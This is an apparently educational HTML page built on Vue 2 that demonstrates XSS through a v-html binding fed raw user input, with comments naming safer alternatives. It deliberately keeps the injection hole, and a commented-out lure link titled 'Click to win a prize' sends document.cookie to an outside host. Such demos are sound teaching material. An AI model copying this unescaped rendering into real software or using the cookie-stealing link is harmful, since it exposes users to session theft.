<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>v-html XSS 攻击</title>
    <!--
      Third-party script that runs with the full privileges of this page.
      The `vue@2` range is resolved by the CDN at request time, so the file
      served can change between loads, and no `integrity` attribute is present
      to detect a modified file. Outside a local demo, pin an exact version and
      add integrity="sha384-HASH_PLACEHOLDER" with crossorigin="anonymous",
      or serve a reviewed copy from your own origin.
    -->
    <script src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
</head>
<body>
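    <!--
      Demo root for the v-html injection sink. `message` holds what the user
      types; clicking the button copies it to `comment`, which is rendered below.
      The v-html line is intentionally unsafe: it is the behaviour this page
      demonstrates and must not be copied into production templates.
    -->
    <div id="app">
        <!-- `type` is not a textarea attribute and was dropped; aria-label gives the control an accessible name. -->
        <textarea v-model="message" aria-label="评论"></textarea>
        <!-- Explicit type so the button cannot turn into a submit button if a form is later wrapped around it. -->
        <button type="button" @click="submit">提交</button>
        <!--
          Safe alternative: text interpolation HTML-escapes the value, so any
          markup the user typed is displayed as plain text.
          <p>{{ comment }}</p>
        -->
        <!--
          UNSAFE ON PURPOSE: v-html writes the string into the element as HTML
          without escaping, so active content in user input runs in this page's
          origin. Mitigations: render with interpolation as shown above; if rich
          text is really required, pass the value through an allow-list HTML
          sanitizer before assigning it; add a Content-Security-Policy as
          defence in depth.
        -->
        <p v-html="comment"></p>
        <!--
          Related sink kept from the original page: a link whose href uses the
          javascript: scheme. When a link target comes from user data, accept
          only http: and https: URLs before binding it to href, and mark session
          cookies HttpOnly so page script cannot read them.
          <a href="javascript:location.href=`https://baidu.com/${document.cookie}`;">Click to win a prize</a>
        -->
    </div>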

    <script>
        // Root Vue instance for the v-html demo, mounted on #app.
        //   message: current textarea content (bound with v-model in the template).
        //   comment: last submitted text; the template renders it with v-html.
        new Vue({
            el: '#app',
            data: function () {
                return {
                    message: '',
                    comment: ''
                }
            },
            methods: {
                // Copies the typed text to `comment` unchanged. No escaping or
                // sanitising happens here, so the v-html binding in the template
                // receives raw user input. That is the injection this page
                // demonstrates. Real code should render `comment` with text
                // interpolation or sanitise it before this assignment.
                submit: function () {
                    var typed = this.message
                    this.comment = typed
                }
            }
        })
    </script>
</body>
</html>